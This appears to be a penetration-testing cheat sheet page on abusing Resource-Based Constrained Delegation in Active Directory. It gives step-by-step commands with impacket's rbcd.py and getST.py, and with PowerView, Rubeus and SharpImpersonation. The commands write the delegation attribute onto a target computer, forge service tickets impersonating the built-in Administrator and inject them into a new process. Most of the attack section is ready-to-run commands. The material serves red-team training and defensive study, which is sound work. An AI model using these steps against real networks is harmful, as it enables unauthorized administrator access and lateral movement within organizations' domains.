# Resource-Based Constrained Delegation

Resource-Based Constrained Delegation is a feature in Kerberos authentication where a computer trusts another account to impersonate users to it (e.g., ComputerA allows ComputerB to impersonate any user and authenticate to ComputerA as that user).

> Attribute: msDS-AllowedToActOnBehalfOfOtherIdentity

To exploit Resource-Based Constrained Delegation, you need a few prerequisites:

* Control over a user or computer account with a SPN (ComputerA or UserA)
* Permissions to modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute for ComputerB (the target computer you want access to)

## Exploit

#### Scenario

You control ComputerA and a domain user account, `ducky`, who has WriteProperty permissions for ComputerB.

The goal is to make ComputerB trust ComputerA for delegation so that a ST for ducky -> ComputerA can be used in S4U2Proxy to obtain a ST for ducky -> ComputerB.

{% tabs %}
{% tab title="impacket-rbcd" %}
{% embed url="<https://github.com/fortra/impacket>" %}

{% code title="Linux (Attacker)" %}

```fish
## Add the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to Computer B
## to allow delegation from Computer A
rbcd.py -delegate-from 'ComputerA$' -delegate-to 'ComputerB$' -dc-ip '[DC IP]' -action 'write' '[domain]/ducky:Password'

## Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to confirm it
rbcd.py -delegate-to 'ComputerB$' -dc-ip '[DC IP]' -action 'read' '[domain]/ducky:Password'

## Obtain a ST using credentials for ComputerA$ impersonating built-in Administrator
getST.py -spn 'cifs/ComputerB$' -impersonate Administrator -dc-ip '[DC IP]' '[domain]/ComputerA$:Password'

```

{% endcode %}
{% endtab %}

{% tab title="PowerVIew/Rubeus" %}
{% embed url="<https://github.com/GhostPack/Rubeus>" %}

{% embed url="<https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1>" %}

{% embed url="<https://github.com/S3cur3Th1sSh1t/SharpImpersonation>" %}

{% code title="Windows" %}

```powershell
## Get SID of ComputerA
Get-DomainComputer -Identity ComputerA -Properties objectSid

## Build the raw binary value for msDS-AllowedToActOnBehalfOfOtherIdentity
## using ComputerA's SID
$rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;[ComputerA's SID])"
$rsdb = New-Object byte[] ($rsd.BinaryLength)
$rsd.GetBinaryForm($rsdb, 0)

## Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute onto ComputerB
$rsd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;[ComputerA's SID])"
$rsdb = New-Object byte[] ($rsd.BinaryLength)
$rsd.GetBinaryForm($rsdb, 0)
Get-DomainComputer -Identity "ComputerB" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $rsdb}

## Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute to confirm it
Get-DomainComputer -Identity "ComputerB" -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

## Request TGT for ComputerA$
Rubeus.exe asktgt /user:ComputerA$ /rc4:[NTLM password hash for ComputerA] /nowrap

## S4U2Self and S4U2Proxy to get ST as Administrator for ComputerB
Rubeus.exe s4u /user:ComputerA$ /impersonateuser:Administrator /msdsspn:cifs/ComputerB.weelee.zip /ticket [ComputerA TGT] /nowrap

## Inject the newly obtained ST as Administrator for ComputerB into a new process
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:Administrator /password:AnyPassword /ticket:[ComputerB ST]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"
```

{% endcode %}
{% endtab %}
{% endtabs %}